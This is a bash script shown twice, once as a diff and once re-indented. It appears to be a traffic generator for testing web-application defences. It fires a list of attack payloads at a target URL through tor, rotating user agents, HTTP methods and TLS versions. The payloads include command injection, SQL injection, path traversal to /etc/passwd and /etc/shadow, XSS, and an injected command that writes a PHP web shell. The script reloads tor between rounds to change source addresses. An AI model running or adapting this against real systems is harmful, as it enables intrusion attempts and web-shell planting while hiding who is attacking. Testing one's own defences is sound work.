Mikej81 · July 24, 2024 11:35 · Mikej81 · May 5, 2022 · Mikej81 · May 6, 2022
diff --git a/traffic_gen.sh b/traffic_gen.sh
 #!/usr/bin/env bash

 # Detect OS / Platform
 osName=$(uname -s)
 case $osName in
  Linux*)   machine="Linux" ;;
  Darwin*)  machine="Mac" ;;
  *)        machine="UNKNOWN:$osName" ;;
 esac

 update_dependencies() {
  if [[ "$machine" == "Mac" ]]; then
    echo "OSX Detected, checking dependencies..."
    brew update > /dev/null && brew upgrade > /dev/null
    for pkg in jq torsocks curl tor; do
      brew ls --versions $pkg > /dev/null || brew install $pkg
    done
  elif [[ "$machine" == "Linux" ]]; then
    if [ -f /etc/redhat-release ]; then
      yum -y update > /dev/null && yum -y install jq torsocks curl > /dev/null
    elif [ -f /etc/lsb-release ]; then
      apt-get -qq update && apt-get -qq -y install jq torsocks curl tor > /dev/null
      npm install --location=global puppeteer domcurl > /dev/null
      DOMCURL=$(which domcurl)
      sed --in-place --follow-symlinks "s/\['--no-sandbox', '--disable-setuid-sandbox']/\['--no-sandbox', '--disable-setuid-sandbox', '--proxy-server=socks5:\/\/127.0.0.1:9050' ]/" $DOMCURL
    fi
  fi
 }

 update_dependencies

 # Define attack vectors
 paths=(
  "/" "/users/authenticate" "/users" "/worm.msi" "/?cmd=cat%20/etc/passwd" "/login.jsp"
  "/product?code=echo%20shell_exec(%27/sbin/ifconfig%20eth0%27);" "/product?id=4%20OR%201=1"
  "/../../../../etc/shadow" "/cart?search=aaa'><script>prompt('Please+enter+your+password');</script>"
  "/get-files?file=/etc/passwd" "/main.cgi?file=main.cgi" "/?query=<script>alert('XSS Beware')</script>"
  "/.htaccess" "/cart?page=https://$1/product/1YMWWN1N4O" "/bot.exe" "/hack.py"
  "/admin" "/config" "/debug" "/robots.txt" "/sitemap.xml" "/hidden"
  "/?1cet8lw6uvc8g=;id\n" "/?1cet8lw6uvc8h=;/usr/bin/id\n" "?filtering=1&filter_model=2500d?1cet8lw6uvc8j=||/usr/bin/id|"
  "?add-to-cart=945?1cet8lw6uvc8k=echo%20%22%3C%3Fphp%20system(%24_GET%5B'cmd'%5D)%3B%20%3F%3E%22%20%3E%20cmd.php"
  "" "/login/"
 )

 useragents=(
  "Googlebot/2.1 (+http://www.google.com/bot.html)" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
  "curl/7.54.1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15"
  "Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1"
  "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/81.0"
  "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
  "Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.79 Mobile Safari/537.36 EdgA/97.0.1072.69"
  ""
 )

 httpmethods=("POST" "GET" "PUT" "PATCH" "DELETE")
 tls_versions=("tlsv1" "tlsv1.1" "tlsv1.2" "tlsv1.3")

 # Seed random generator
 RANDOM=$$$(date +%s)

 if [[ $# -lt 2 ]]; then
    echo 'Please provide a URL to scan as first argument in the format of http[s]://fqdn.to.scan (no trailing slash)'
    echo 'Please provide a hit count as second argument in the format of 1-1000'
    exit 0
 fi

 url=$1
 count=$2
 counter=0

 for ((i=1;i<=count;i++)); do
  for path in "${paths[@]}"; do
    randomagent=${useragents[RANDOM % ${#useragents[@]}]}
    for method in "${httpmethods[@]}"; do
      if [[ $method == "POST" ]]; then
        for tls in "${tls_versions[@]}"; do
          curl --socks5 127.0.0.1:9050 --$tls -k -s -o /dev/null -X $method \
          -F 'username=hackerman' -F 'password=pass@word123' -w "%{http_code}" -A "$randomagent" $url$path
        done
      else
        if (( counter % 2 == 0 )); then
          domcurl -A "$randomagent" --url $url$path > /dev/null 2>&1
        else
          curl --socks5 127.0.0.1:9050 --tlsv1.2 --tls-max 1.2 -k -s -o /dev/null -X $method -w "%{http_code}" -A "$randomagent" $url$path
        fi
        ((counter++))
      fi
    done
  done
  sudo systemctl reload tor
  sleep 5
 done
	#!/usr/bin/env bash

	# Detect OS / Platform
	osName=$(uname -s)
	case $osName in
	Linux*) machine="Linux" ;;
	Darwin*) machine="Mac" ;;
	*) machine="UNKNOWN:$osName" ;;
	esac

	update_dependencies() {
	if [[ "$machine" == "Mac" ]]; then
	echo "OSX Detected, checking dependencies..."
	brew update > /dev/null && brew upgrade > /dev/null
	for pkg in jq torsocks curl tor; do
	brew ls --versions $pkg > /dev/null \|\| brew install $pkg
	done
	elif [[ "$machine" == "Linux" ]]; then
	if [ -f /etc/redhat-release ]; then
	yum -y update > /dev/null && yum -y install jq torsocks curl > /dev/null
	elif [ -f /etc/lsb-release ]; then
	apt-get -qq update && apt-get -qq -y install jq torsocks curl tor > /dev/null
	npm install --location=global puppeteer domcurl > /dev/null
	DOMCURL=$(which domcurl)
	sed --in-place --follow-symlinks "s/\['--no-sandbox', '--disable-setuid-sandbox']/\['--no-sandbox', '--disable-setuid-sandbox', '--proxy-server=socks5:\/\/127.0.0.1:9050' ]/" $DOMCURL
	fi
	fi
	}

	update_dependencies

	# Define attack vectors
	paths=(
	"/" "/users/authenticate" "/users" "/worm.msi" "/?cmd=cat%20/etc/passwd" "/login.jsp"
	"/product?code=echo%20shell_exec(%27/sbin/ifconfig%20eth0%27);" "/product?id=4%20OR%201=1"
	"/../../../../etc/shadow" "/cart?search=aaa'><script>prompt('Please+enter+your+password');</script>"
	"/get-files?file=/etc/passwd" "/main.cgi?file=main.cgi" "/?query=<script>alert('XSS Beware')</script>"
	"/.htaccess" "/cart?page=https://$1/product/1YMWWN1N4O" "/bot.exe" "/hack.py"
	"/admin" "/config" "/debug" "/robots.txt" "/sitemap.xml" "/hidden"
	"/?1cet8lw6uvc8g=;id\n" "/?1cet8lw6uvc8h=;/usr/bin/id\n" "?filtering=1&filter_model=2500d?1cet8lw6uvc8j=\|\|/usr/bin/id\|"
	"?add-to-cart=945?1cet8lw6uvc8k=echo%20%22%3C%3Fphp%20system(%24_GET%5B'cmd'%5D)%3B%20%3F%3E%22%20%3E%20cmd.php"
	"" "/login/"
	)

	useragents=(
	"Googlebot/2.1 (+http://www.google.com/bot.html)" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
	"curl/7.54.1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15"
	"Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1"
	"Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/81.0"
	"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36"
	"Mozilla/5.0 (Linux; Android 10; HD1913) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.79 Mobile Safari/537.36 EdgA/97.0.1072.69"
	""
	)

	httpmethods=("POST" "GET" "PUT" "PATCH" "DELETE")
	tls_versions=("tlsv1" "tlsv1.1" "tlsv1.2" "tlsv1.3")

	# Seed random generator
	RANDOM=$$$(date +%s)

	if [[ $# -lt 2 ]]; then
	echo 'Please provide a URL to scan as first argument in the format of http[s]://fqdn.to.scan (no trailing slash)'
	echo 'Please provide a hit count as second argument in the format of 1-1000'
	exit 0
	fi

	url=$1
	count=$2
	counter=0

	for ((i=1;i<=count;i++)); do
	for path in "${paths[@]}"; do
	randomagent=${useragents[RANDOM % ${#useragents[@]}]}
	for method in "${httpmethods[@]}"; do
	if [[ $method == "POST" ]]; then
	for tls in "${tls_versions[@]}"; do
	curl --socks5 127.0.0.1:9050 --$tls -k -s -o /dev/null -X $method \
	-F 'username=hackerman' -F 'password=pass@word123' -w "%{http_code}" -A "$randomagent" $url$path
	done
	else
	if (( counter % 2 == 0 )); then
	domcurl -A "$randomagent" --url $url$path > /dev/null 2>&1
	else
	curl --socks5 127.0.0.1:9050 --tlsv1.2 --tls-max 1.2 -k -s -o /dev/null -X $method -w "%{http_code}" -A "$randomagent" $url$path
	fi
	((counter++))
	fi
	done
	done
	sudo systemctl reload tor
	sleep 5
	done